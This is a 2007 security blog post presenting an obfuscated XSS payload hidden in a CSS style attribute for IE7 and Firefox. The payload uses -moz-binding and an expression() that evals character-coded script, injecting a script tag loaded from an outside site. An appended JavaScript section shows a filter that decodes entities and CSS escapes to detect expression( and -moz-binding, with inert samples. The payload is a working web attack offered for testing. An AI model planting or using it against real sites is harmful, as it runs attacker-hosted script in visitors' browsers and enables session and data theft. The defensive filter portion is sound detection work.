Ultimate XSS CSS injection
Monday, 26 November 2007
Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin, which I modified slightly, and I found that IE will also accept HTML entities in CSS styles.
The expression part of this technique was first demonstrated by Dan on the slackers forums. Nice one, Dan, and sorry about missing you from the credits.
<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs \/xbl\/xbl\.xml\#xss);xx: e\ xp\re\s\s\ i\o\n((win dow.r!=1)  ? eval('x= String.fro mCharCode; scr=docume nt.createE lement(x(1 15,99,114, 105,112,11 6));scr.se tAttribute (x(115,114 ,99),x(104 ,116,116,1 12,58,47,4 7,98,117,1 15,105,110 ,101,115,1 15,105,110 ,102,111,4 6,99,111,4 6,117,107, 47,108,97, 98,115,47, 120,115,11 5,47,120,1 15,115,46, 106,115)); document.g etElementB yId(x( 105 ,110,106,1 01,99,116  )).appendC hild(scr); window.r=1 ;') : 1);" id="inject">test</div>
Please use my tool Hackvertor if you need to decode the IE vector, as it will provide you with all the necessary conversions. Please note the vector has been broken up onto multiple lines for viewing purposes; please remove the line breaks when testing the vector.
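The filtering side of the vector above, as an added example that is not part of the original post: a style-attribute filter has to undo HTML entities and CSS backslash escapes before it matches on `expression(` or `-moz-binding`, otherwise the escaped forms pass straight through. The function names, rule ids and sample strings are constructed for illustration, and the samples carry inert payloads.

```javascript
// Added example: normalise a style attribute, then flag script-capable CSS.
const NAMED = new Map([['amp', '&'], ['lt', '<'], ['gt', '>'], ['quot', '"'], ['apos', "'"]]);

// Map a numeric escape to a character; NUL, surrogates and out-of-range become U+FFFD.
function safeCodePoint(cp) {
  const bad = cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff);
  return bad ? '\ufffd' : String.fromCodePoint(cp);
}

// Step 1: the HTML parser decodes character references before CSS sees the value.
function decodeEntities(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#(\d+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (hex) return safeCodePoint(parseInt(hex, 16));
    if (dec) return safeCodePoint(parseInt(dec, 10));
    return NAMED.get(name.toLowerCase()) || m; // unknown names stay untouched
  });
}

// Step 2: CSS escapes. "\" + 1-6 hex digits (+ one optional whitespace) is a
// code point; "\" + any other non-newline character is that character itself.
function decodeCssEscapes(s) {
  return s.replace(/\\(?:([0-9a-f]{1,6})[ \t\r\n\f]?|([^\r\n\f]))/gi,
    (m, hex, ch) => (hex ? safeCodePoint(parseInt(hex, 16)) : ch));
}

// Step 3: drop whitespace and control characters, fold case.
function normaliseStyle(raw) {
  const css = decodeCssEscapes(decodeEntities(raw));
  return css.replace(/[\s\u0000-\u001f]+/g, '').toLowerCase();
}

// The two constructs the post's vector relies on (assumed rule ids).
const RULES = [
  { id: 'ie-expression', re: /expression\(/ },
  { id: 'moz-binding', re: /-moz-binding:/ },
];

// Returns the ids of every rule that matches the normalised value.
function scanStyle(raw) {
  const norm = normaliseStyle(raw);
  return RULES.filter((r) => r.re.test(norm)).map((r) => r.id);
}

// Constructed samples: same encodings as the post, placeholder host, inert bodies.
const SAMPLES = {
  escaped: 'xx:e\\xp\\re\\s\\s\\i\\o\\n(1)',
  binding: '\\-\\mo\\z\\-b\\i\\nd\\in\\g:\\url(//example.invalid/x.xml#x)',
  entity: 'xx:&#101;x&#x70;ression(1)',
  benign: 'color: red; background: url(/img/a.png)',
};
```

The match is deliberately conservative: it runs on the whole normalised value, so a quoted string that merely contains `expression(` is flagged too.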